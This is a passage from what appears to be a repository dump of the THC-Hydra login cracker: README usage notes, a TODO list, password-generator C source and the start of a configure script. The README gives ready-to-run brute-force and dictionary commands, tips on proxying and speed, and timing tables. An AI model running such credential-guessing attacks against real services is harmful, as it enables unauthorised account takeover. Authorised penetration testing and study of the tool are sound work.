1. A single target on the command line: just put the IP or DNS address in\n 2. A network range on the command line: CIDR specification like \"192.168.0.0/24\"\n 3. A list of hosts in a text file: one line per entry (see below)\n\nSECOND - select your protocol\n Try to avoid telnet, as it is unreliable for detecting a correct or false login attempt.\n Use a port scanner to see which protocols are enabled on the target.\n\nTHIRD - check if the module has optional parameters\n hydra -U PROTOCOL\n e.g. hydra -U smtp\n\nFOURTH - the destination port\n This is optional; if no port is supplied, the default common port for the\n PROTOCOL is used.\n If you specify SSL to use (\"-S\" option), the SSL common port is used by default.\n\n\nIf you use \"://\" notation, you must use \"[\" \"]\" brackets if you want to supply\nIPv6 addresses or CIDR (\"192.168.0.0/24\") notations to attack:\n hydra [some command line options] ftp://[192.168.0.0/24]/\n hydra [some command line options] -6 smtps://[2001:db8::1]/NTLM\n\nNote that everything Hydra does is IPv4 only!\nIf you want to attack IPv6 addresses, you must add the \"-6\" command line option.\nAll attacks are then IPv6 only!\n\nIf you want to supply your targets via a text file, you can not use the ://\nnotation, but use the old style and just supply the protocol (and module options):\n hydra [some command line options] -M targets.txt ftp\nYou can also supply the port for each target entry by adding \":\" after a\ntarget entry in the file, e.g.:\n\n```\nfoo.bar.com\ntarget.com:21\nunusual.port.com:2121\ndefault.used.here.com\n127.0.0.1\n127.0.0.1:2121\n```\n\nNote that if you want to attach IPv6 targets, you must supply the -6 option\nand *must* put IPv6 addresses in brackets in the file(!) like this:\n\n```\nfoo.bar.com\ntarget.com:21\n[fe80::1%eth0]\n[2001::1]\n[2002::2]:8080\n[2a01:24a:133:0:00:123:ff:1a]\n```\n\nLOGINS AND PASSWORDS\n--------------------\nYou have many options on how to attack with logins and passwords\nWith -l for login and -p for password, you tell Hydra that this is the only\nlogin and/or password to try.\nWith -L for logins and -P for passwords, you supply text files with entries.\ne.g.:\n\n```\nhydra -l admin -p password ftp://localhost/\nhydra -L default_logins.txt -p test ftp://localhost/\nhydra -l admin -P common_passwords.txt ftp://localhost/\nhydra -L logins.txt -P passwords.txt ftp://localhost/\n```\n\nAdditionally, you can try passwords based on the login via the \"-e\" option.\nThe \"-e\" option has three parameters:\n\n```\ns - try the login as password\nn - try an empty password\nr - reverse the login and try it as a password\n```\n\nIf you want to, e.g., try \"try login as password and \"empty password\", you\nspecify \"-e sn\" on the command line.\n\nBut there are two more modes for trying passwords than -p/-P:\nYou can use a text file where a login and password pair is separated by a colon,\ne.g.:\n\n```\nadmin:password\ntest:test\nfoo:bar\n```\n\nThis is a common default account style listing that is also generated by the\ndpl4hydra.sh default account file generator supplied with Hydra.\nYou use such a text file with the -C option - note that in this mode you\ncan not use -l/-L/-p/-P options (-e nsr however you can).\nExample:\n\n```\nhydra -C default_accounts.txt ftp://localhost/\n```\n\nAnd finally, there is a brute-force mode with the -x option (which you can not\nuse with -p/-P/-C):\n\n```\n-x minimum_length:maximum_length:charset\n```\n\nThe charset definition is `a` for lowercase letters, `A` for uppercase letters,\n`1` for numbers and for anything else, what you supply is their real representation.\nExamples:\n\n```\n-x 1:3:a generate passwords from length 1 to 3 with all lowercase letters\n-x 2:5:/ generate passwords from length 2 to 5 containing only slashes\n-x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbers\n-x '3:3:aA1&~#\\\\ \"\\'<{([-|_^@)]=}>$%*?./§,;:!`' -v generates length 3 passwords with all 95 characters, and verbose.\n```\n\nExample:\n\n```\nhydra -l ftp -x 3:3:a ftp://localhost/\n```\n\nSPECIAL OPTIONS FOR MODULES\n---------------------------\nVia the third command line parameter (TARGET SERVICE OPTIONAL) or the -m\ncommand line option, you can pass one option to a module.\nMany modules use this; a few require it!\n\nTo see the special option of a module, type:\n\n hydra -U \n\ne.g.\n\n ./hydra -U http-post-form\n\nThe special options can be passed via the -m parameter, as 3rd command line\noption or in the service://target/option format.\n\nExamples (they are all equal):\n\n```\n./hydra -l test -p test -m PLAIN 127.0.0.1 imap\n./hydra -l test -p test 127.0.0.1 imap PLAIN\n./hydra -l test -p test imap://127.0.0.1/PLAIN\n```\n\nRESTORING AN ABORTED/CRASHED SESSION\n------------------------------------\nWhen Hydra is aborted with Control-C, killed, or crashes, it leaves a\n\"hydra.restore\" file behind, which contains all necessary information to\nrestore the session. This session file is written every 5 minutes.\nNOTE: the hydra.restore file can NOT be copied to a different platform (e.g.\nfrom little endian to big endian, or from Solaris to AIX)\n\nHOW TO SCAN/CRACK OVER A PROXY\n------------------------------\nThe environment variable HYDRA_PROXY_HTTP defines the web proxy (this works\njust for the HTTP services!).\nThe following syntax is valid:\n\n```\nHYDRA_PROXY_HTTP=\"http://123.45.67.89:8080/\"\nHYDRA_PROXY_HTTP=\"http://login:password@123.45.67.89:8080/\"\nHYDRA_PROXY_HTTP=\"proxylist.txt\"\n```\n\nThe last example is a text file containing up to 64 proxies (in the same\nformat definition as the other examples).\n\nFor all other services, use the HYDRA_PROXY variable to scan/crack.\nIt uses the same syntax. eg:\n\n```\nHYDRA_PROXY=[connect|socks4|socks5]://[login:password@]proxy_addr:proxy_port\n```\n\nfor example:\n\n```\nHYDRA_PROXY=connect://proxy.anonymizer.com:8000\nHYDRA_PROXY=socks4://auth:pw@127.0.0.1:1080\nHYDRA_PROXY=socksproxylist.txt\n```\n\nADDITIONAL HINTS\n----------------\n* Sort your password files by likelihood and use the -u option to find\n passwords much faster!\n* uniq your dictionary files! This can save you a lot of time :-)\n cat words.txt | sort | uniq > dictionary.txt\n* If you know that the target is using a password policy (allowing users\n only to choose a password with a minimum length of 6, containing at least one\n letter and one number, etc. use the tool pw-inspector, which comes along\n with the hydra package, to reduce the password list:\n cat dictionary.txt | pw-inspector -m 6 -c 2 -n > passlist.txt\n\n\nRESULTS OUTPUT\n--------------\n\nThe results are output to stdio along with the other information. Via the -o\ncommand line option, the results can also be written to a file. Using -b,\nthe format of the output can be specified. Currently, these are supported:\n\n* `text` - plain text format\n* `jsonv1` - JSON data using version 1.x of the schema (defined below).\n* `json` - JSON data using the latest version of the schema; currently, there\n is only version 1.\n\nIf using JSON output, the results file may not be valid JSON if there are\nserious errors in booting Hydra.\n\n\nJSON Schema\n-----------\nHere is an example of the JSON output. Notes on some of the fields:\n\n* `errormessages` - an array of zero or more strings that are normally printed\n to stderr at the end of Hydra's run. The text is very free-form.\n* `success` - indication if Hydra ran correctly without error (**NOT** if\n passwords were detected). This parameter is either the JSON value `true`\n or `false` depending on completion.\n* `quantityfound` - How many username+password combinations were discovered.\n* `jsonoutputversion` - Version of the schema, 1.00, 1.01, 1.11, 2.00,\n 2.03, etc. Hydra will make the second tuple of the version to always be two\n digits to make it easier for downstream processors (as opposed to v1.1 vs\n v1.10). The minor-level versions are additive, so 1.02 will contain more\n fields than version 1.00 and will be backward compatible. Version 2.x will\n break something from the version 1.x output.\n\nVersion 1.00 example:\n```\n{\n \"errormessages\": [\n \"[ERROR] Error Message of Something\",\n \"[ERROR] Another Message\",\n \"These are very free form\"\n ],\n \"generator\": {\n \"built\": \"2021-03-01 14:44:22\",\n \"commandline\": \"hydra -b jsonv1 -o results.json ... ...\",\n \"jsonoutputversion\": \"1.00\",\n \"server\": \"127.0.0.1\",\n \"service\": \"http-post-form\",\n \"software\": \"Hydra\",\n \"version\": \"v8.5\"\n },\n \"quantityfound\": 2,\n \"results\": [\n {\n \"host\": \"127.0.0.1\",\n \"login\": \"bill@example.com\",\n \"password\": \"bill\",\n \"port\": 9999,\n \"service\": \"http-post-form\"\n },\n {\n \"host\": \"127.0.0.1\",\n \"login\": \"joe@example.com\",\n \"password\": \"joe\",\n \"port\": 9999,\n \"service\": \"http-post-form\"\n }\n ],\n \"success\": false\n}\n```\n\n\nSPEED\n-----\nThrough the parallelizing feature, this password cracker tool can be very\nfast; however, it depends on the protocol. The fastest are generally POP3\nand FTP.\nExperiment with the task option (-t) to speed things up! The higher - the\nfaster ;-) (but too high - and it disables the service)\n\n\n\nSTATISTICS\n----------\nRun against a SuSE Linux 7.2 on localhost with a \"-C FILE\" containing\n295 entries (294 tries invalid logins, 1 valid). Every test was run three\ntimes (only for \"1 task\" just once), and the average was noted down.\n\n```\n\t\t\tP A R A L L E L T A S K S\nSERVICE\t1\t4\t8\t16\t32\t50\t64\t100\t128\n------- --------------------------------------------------------------------\ntelnet\t23:20\t5:58\t2:58\t1:34\t1:05\t0:33\t0:45*\t0:25*\t0:55*\nftp\t45:54\t11:51\t5:54\t3:06\t1:25\t0:58\t0:46\t0:29\t0:32\npop3\t92:10\t27:16\t13:56\t6:42\t2:55\t1:57\t1:24\t1:14\t0:50\nimap\t31:05\t7:41\t3:51\t1:58\t1:01\t0:39\t0:32\t0:25\t0:21\n```\n\n(*)\nNote: telnet timings can be VERY different for 64 to 128 tasks! e.g. with\n128 tasks, running four times, resulted in timings between 28 and 97 seconds!\nThe reason for this is unknown...\n\nguesses per task (rounded up):\n\n 295\t74\t38\t19\t10\t6\t5\t3\t3\n\nguesses possible per connect (depends on the server software and config):\n\n telnet\t4\n\tftp\t6\n\tpop3\t1\n\timap\t3\n\n\n\nBUGS & FEATURES\n---------------\nHydra:\nEmail me or David if you find bugs or if you have written a new module.\nvh@thc.org (and put \"antispam\" in the subject line)\n\n\nYou should use PGP to encrypt emails to vh@thc.org :\n\n```\n-----BEGIN PGP PUBLIC KEY BLOCK-----\nVersion: GnuPG v3.3.3 (vh@thc.org)\n\n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\nzB3yrr+vYBT0uDWmxwPjiJs=\n=ytEf\n-----END PGP PUBLIC KEY BLOCK-----\n```" }, { "path": "TODO", "content": "\n./configure:\n - add test for -march=native\n\n--- this is old ---\n\nPrio 1:\n* add cookie support to hydra-http.c\n* hydra-smb more than 1 connection?\n* add help hints?\n* test teamspeak, icq\n* check all modules to ensure no check is lost because of a timeout, buf == NULL etc.\n* optimize smtp module\n* optimize ssl performance\n* add snmpv3 privacy support\n* http: option to specify an url for testing if the login was right or wrong\n* does hydra-oracle work with service names? (often SIDs do not work anymore)\n* fix crash for -R on x64\n* IPv6 addresses in txt file does not work\n* prot://ipv6addr:port does not have []\n\n\nPrio 2:\n* add support for IPv6 Link Local Addresses like fe80::1%eth0 for Solaris and *BSD\n* add crack info when key is pressed\n* hydra-smb support NTLMv2 (when its fixed)\n* support for 802.1x EAP via libpcap\n* TN3270, and TN3270 user enumeration\n* Support nmap -o and -oM output files\n\n\nPrio 3:\n* Specify user-agent for http-form module as extra optional option\n* IPv6 support for sip\n* add RIP, OSPF, BGP, PIM\n* add diameter support\n* round robin proxy support ?\n* add tn5250 support\n* Add Sybase support, using freetds lib (can be used for ms-sql)\n* Add Informix ?\n" }, { "path": "_config.yml", "content": "title: \"thc-hydra\" \ntheme: jekyll-theme-midnight\n" }, { "path": "bfg.c", "content": "\n/* code original by Jan Dlabal , partially rewritten by vh. */\n\n#include \n#include \n#include \n#include \n#include \n#ifdef __sun\n#include \n#elif defined(__FreeBSD__) || defined(__IBMCPP__) || defined(_AIX)\n#include \n#else\n#include \n#endif\n#include \"bfg.h\"\n\nbf_option bf_options;\n\n#ifdef HAVE_MATH_H\n\nextern int32_t debug;\n\nstatic int32_t add_single_char(char ch, char flags, int32_t *crs_len) {\n if ((ch >= '2' && ch <= '9') || ch == '0') {\n if ((flags & BF_NUMS) > 0) {\n printf(\"[ERROR] character %c defined in -x although the whole number \"\n \"range was already defined by '1', ignored\\n\",\n ch);\n return 0;\n }\n // printf(\"[WARNING] adding character %c for -x, note that '1' will add all\n // numbers from 0-9\\n\", ch);\n }\n if (tolower((int32_t)ch) >= 'b' && tolower((int32_t)ch) <= 'z') {\n if ((ch <= 'Z' && (flags & BF_UPPER) > 0) || (ch > 'Z' && (flags & BF_UPPER) > 0)) {\n printf(\"[ERROR] character %c defined in -x although the whole letter \"\n \"range was already defined by '%c', ignored\\n\",\n ch, ch <= 'Z' ? 'A' : 'a');\n return 0;\n }\n // printf(\"[WARNING] adding character %c for -x, note that '%c' will add all\n // %scase letters\\n\", ch, ch <= 'Z' ? 'A' : 'a', ch <= 'Z' ? \"up\" : \"low\");\n }\n (*crs_len)++;\n if (BF_CHARSMAX - *crs_len < 1) {\n free(bf_options.crs);\n fprintf(stderr, \"Error: charset specification exceeds %d characters.\\n\", BF_CHARSMAX);\n return 1;\n } else {\n bf_options.crs[*crs_len - 1] = ch;\n bf_options.crs[*crs_len] = '\\0';\n }\n return 0;\n}\n// return values : 0 on success, 1 on error\n//\n// note that we check for -x .:.:ab but not for -x .:.:ba\n//\nint32_t bf_init(char *arg) {\n int32_t i = 0;\n int32_t crs_len = 0;\n char flags = 0;\n char *tmp = strchr(arg, ':');\n\n if (!tmp) {\n fprintf(stderr, \"Error: Invalid option format for -x\\n\");\n return 1;\n } else {\n tmp[0] = '\\0';\n }\n bf_options.from = atoi(arg);\n if (bf_options.from < 1 || bf_options.from > 127) {\n fprintf(stderr, \"Error: minimum length must be between 1 and 127, format: \"\n \"-x min:max:types\\n\");\n return 1;\n }\n arg = tmp + 1;\n tmp++;\n if (!arg[0]) {\n fprintf(stderr, \"Error: no maximum length specified for -x min:max:types!\\n\");\n return 1;\n }\n tmp = strchr(arg, ':');\n if (!tmp) {\n fprintf(stderr, \"Error: Invalid option format for -x\\n\");\n return 1;\n } else {\n tmp[0] = '\\0';\n }\n bf_options.to = atoi(arg);\n tmp++;\n\n if (bf_options.from > bf_options.to) {\n fprintf(stderr, \"Error: you specified a minimum length higher than the \"\n \"maximum length!\\n\");\n return 1;\n }\n\n if (tmp[0] == 0) {\n fprintf(stderr, \"Error: charset not specified!\\n\");\n return 1;\n }\n bf_options.crs = malloc(sizeof(char) * BF_CHARSMAX);\n\n if (bf_options.crs == NULL) {\n fprintf(stderr, \"Error: can't allocate enough memory!\\n\");\n return 1;\n }\n bf_options.crs[0] = 0;\n\n for (; tmp[i]; i++) {\n if (bf_options.disable_symbols) {\n if (add_single_char(tmp[i], flags, &crs_len) == -1)\n return 1;\n } else {\n switch (tmp[i]) {\n case 'a':\n crs_len += 26;\n if (BF_CHARSMAX - crs_len < 1) {\n free(bf_options.crs);\n fprintf(stderr, \"Error: charset specification exceeds %d characters.\\n\", BF_CHARSMAX);\n return 1;\n } else if (flags & BF_LOWER) {\n free(bf_options.crs);\n fprintf(stderr, \"Error: 'a' specified more than once in charset!\\n\");\n return 1;\n } else {\n strcat(bf_options.crs, \"abcdefghijklmnopqrstuvwxyz\");\n flags |= BF_LOWER;\n }\n break;\n\n case 'A':\n crs_len += 26;\n if (BF_CHARSMAX - crs_len < 1) {\n free(bf_options.crs);\n fprintf(stderr, \"Error: charset specification exceeds %d characters.\\n\", BF_CHARSMAX);\n return 1;\n } else if (flags & BF_UPPER) {\n free(bf_options.crs);\n fprintf(stderr, \"Error: 'A' specified more than once in charset!\\n\");\n return 1;\n } else {\n strcat(bf_options.crs, \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\");\n flags |= BF_UPPER;\n }\n break;\n\n case '1':\n crs_len += 10;\n if (BF_CHARSMAX - crs_len < 1) {\n free(bf_options.crs);\n fprintf(stderr, \"Error: charset specification exceeds %d characters.\\n\", BF_CHARSMAX);\n return 1;\n } else if (flags & BF_NUMS) {\n free(bf_options.crs);\n fprintf(stderr, \"Error: '1' specified more than once in charset!\\n\");\n return 1;\n } else {\n strcat(bf_options.crs, \"0123456789\");\n flags |= BF_NUMS;\n }\n break;\n\n default:\n if (add_single_char(tmp[i], flags, &crs_len) == -1)\n return 1;\n break;\n }\n }\n }\n\n bf_options.crs_len = crs_len;\n bf_options.current = bf_options.from;\n\n memset((char *)bf_options.state, 0, sizeof(bf_options.state));\n\n if (debug)\n printf(\"[DEBUG] bfg INIT: from %u, to %u, len: %u, set: %s\\n\", bf_options.from, bf_options.to, bf_options.crs_len, bf_options.crs);\n\n return 0;\n}\n\nuint64_t bf_get_pcount() {\n int32_t i;\n double count = 0;\n uint64_t foo;\n\n for (i = bf_options.from; i <= bf_options.to; i++)\n count += (pow((double)bf_options.crs_len, (double)i));\n if (count >= 0xffffffff) {\n fprintf(stderr, \"\\n[ERROR] definition for password bruteforce (-x) \"\n \"generates more than 4 billion passwords - this is not a bug in the program, it is just not feasible to try so many attempts. Try a calculator how long that would take. duh.\\n\");\n exit(-1);\n }\n\n foo = count / 1;\n return foo;\n}\n\nchar *bf_next() {\n int32_t i, pos = bf_options.current - 1;\n\n if (bf_options.current > bf_options.to)\n return NULL; // we are done\n\n if ((bf_options.ptr = malloc(BF_CHARSMAX)) == NULL) {\n fprintf(stderr, \"Error: Can not allocate memory for -x data!\\n\");\n return NULL;\n }\n\n for (i = 0; i < bf_options.current; ++i)\n bf_options.ptr[i] = bf_options.crs[bf_options.state[i]];\n // we don't subtract the same depending on wether the length is odd or even\n bf_options.ptr[bf_options.current] = 0;\n\n if (debug) {\n printf(\"[DEBUG] bfg IN: len %u, from %u, current %u, to %u, state:\", bf_options.crs_len, bf_options.from, bf_options.current, bf_options.to);\n for (i = 0; i < bf_options.current; i++)\n printf(\" %u\", bf_options.state[i]);\n printf(\", x: %s\\n\", bf_options.ptr);\n }\n\n // we revert the ordering of the bruteforce to fix the first static character\n while (pos >= 0 && (++bf_options.state[pos]) >= bf_options.crs_len) {\n bf_options.state[pos] = 0;\n pos--;\n }\n\n if (pos < 0 || pos >= bf_options.current) {\n bf_options.current++;\n memset((char *)bf_options.state, 0, sizeof(bf_options.state));\n }\n\n return bf_options.ptr;\n}\n\n#endif\n" }, { "path": "bfg.h", "content": "/* (c) 2008 Jan Dlabal */\n/* */\n/* This file is part of the bfg. */\n/* */\n/* bfgen is free software: you can redistribute it and/or modify */\n/* it under the terms of the GNU General Public License as published by */\n/* the Free Software Foundation, either version 3 of the License, or */\n/* any later version. */\n/* */\n/* bfgen is distributed in the hope that it will be useful, */\n/* but WITHOUT ANY WARRANTY; without even the implied warranty of */\n/* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the */\n/* GNU General Public License for more details. */\n/* */\n/* You should have received a copy of the GNU General Public License */\n/* along with bfgen. If not, see . */\n\n#ifndef BF_H\n#define BF_H\n\n#define BF_NAME \"bfg\"\n#define BF_VERSION \"v0.3\"\n#define BF_YEAR \"2009\"\n#define BF_WEBSITE \"http://houbysoft.com/bfg/\"\n\n#define BF_BUFLEN 1024\n#define BF_CHARSMAX \\\n 256 /* how many max possibilities there are for characters, normally it's \\\n 2^8 = 256 */\n\n#define BF_LOWER 1\n#define BF_UPPER 2\n#define BF_NUMS 4\n\ntypedef struct {\n unsigned char from;\n unsigned char to;\n unsigned char current;\n unsigned char state[BF_CHARSMAX]; /* which position has which character */\n unsigned char pos; /* where in current string length is the position */\n unsigned char crs_len; /* length of selected charset */\n char *arg; /* argument received for bfg commandline option */\n char *crs; /* internal representation of charset */\n char *ptr; /* ptr to the last generated password */\n uint32_t disable_symbols;\n} bf_option;\n\nextern bf_option bf_options;\n\n#ifdef HAVE_MATH_H\nextern uint64_t bf_get_pcount();\nextern int32_t bf_init(char *arg);\nextern char *bf_next();\n#endif\n\n#endif\n" }, { "path": "configure", "content": "#!/bin/sh\n#\n# uname -s = Linux | OpenBSD | FreeBSD | Darwin\n# uname -m = i636 or x86_64\n\nif [ \"$1\" = \"-h\" -o \"$1\" = \"--help\" ]; then\n echo Options:\n echo \" --prefix=path path to install hydra and its datafiles to\"\n echo \" --fhs install according to the File System Hierarchy Standard\"\n echo \" --with-oracle=prefix prefix for oracle include dir\"\n echo \" --with-oracle-lib=prefix prefix for oracle lib dir\"\n echo \" --with-ssl=prefix prefix for SSL headers\"\n echo \" --with-ssl-lib=prefix prefix for SSL libraries\"\n echo \" --disable-xhydra disable compilation of hydra GUI\"\n echo \" --nostrip do not per default strip binaries before install\"\n echo \" --debug show debug output to trace errors\"\n echo \" --help this here\"\n echo\n echo If the CC environment variable is set, this is used as the compiler for the configure tests. The default is \\\"gcc\\\" otherwise.\n echo You can also set PKG_CONFIG if necessary.\n exit 0\nfi\n\ntest -z \"$CC\" && CC=gcc\ntest -z \"$PKG_CONFIG\" && PKG_CONFIG=pkg-config\n\nFHS=\"\"\nSIXFOUR=\"\"\nDEBUG=\"\"\nPREFIX=\"\"\nNOSTRIP=\"\"\nORACLE_PATH=\"\"\nORACLE_IPATH=\"\"\nWORACLE_PATH=\"\"\nWORACLE_LIB_PATH=\"\"\nSSL_PATH=\"\"\nSSL_IPATH=\"\"\nWSSL_PATH=\"\"\nWSSL_LIB_PATH=\"\"\nCURSES_PATH=\"\"\nCURSES_IPATH=\"\"\nCRYPTO_PATH=\"\"\nGPGERROR_IPATH=\"\"\nIDN_PATH=\"\"\nIDN_IPATH=\"\"\nPR29_IPATH=\"\"\nPCRE_PATH=\"\"\nPCRE_IPATH=\"\"\nPOSTGRES_PATH=\"\"\nFIREBIRD_PATH=\"\"\nFIREBIRD_IPATH=\"\"\nMYSQL_PATH=\"\"\nMYSQL_IPATH=\"\"\nMCACHED_PATH=\"\"\nMCACHED_IPATH=\"\"\nMONGODB2_PATH=\"\"\nMONGODB2_IPATH=\"\"\nBSON2_PATH=\"\"\nBSON2_IPATH=\"\"\nMONGODB_PATH=\"\"\nMONGODB_IPATH=\"\"\nBSON_PATH=\"\"\nBSON_IPATH=\"\"\nAFP_PATH=\"\"\nAFP_IPATH=\"\"\nNCP_PATH=\"\"\nNCP_IPATH=\"\"\nSVN_PATH=\"\"\nSVN_IPATH=\"\"\nAPR_IPATH=\"\"\nSAPR3_PATH=\"\"\nSAPR3_IPATH=\"\"\nSSH_PATH=\"\"\nSSH_IPATH=\"\"\nNSL_PATH=\"\"\nSOCKET_PATH=\"\"\nMANDIR=\"\"\nXHYDRA_SUPPORT=\"\"\nFREERDP2_PATH=\"\"\nWINPR2_PATH=\"\"\nFREERDP3_PATH=\"\"\nWINPR3_PATH=\"\"\nSMBC_PATH=\"\"\nSMBC_IPATH=\"\"\n\nif [ '!' \"X\" = \"X$*\" ]; then\n while [ $# -gt 0 ] ; do\n if [ \"X\" = \"X$PREFIX\" ]; then\n \t PREFIX_TMP=`echo \"$1\"|sed 's/.*--prefix=//'`\n\t if [ \"$PREFIX_TMP\" != \"$1\" ]; then\n\t\t PREFIX=$PREFIX_TMP\n\t fi\n fi\n if [ \"X\" = \"X$NOSTRIP\" ]; then\n \t NOSTRIP_TMP=`echo \"$1\"|sed 's/.*--nostrip//'`\n\t if [ -z \"$NOSTRIP_TMP\" ]; then\n\t\t NOSTRIP=\"yes\"\n\t fi\n fi\n if 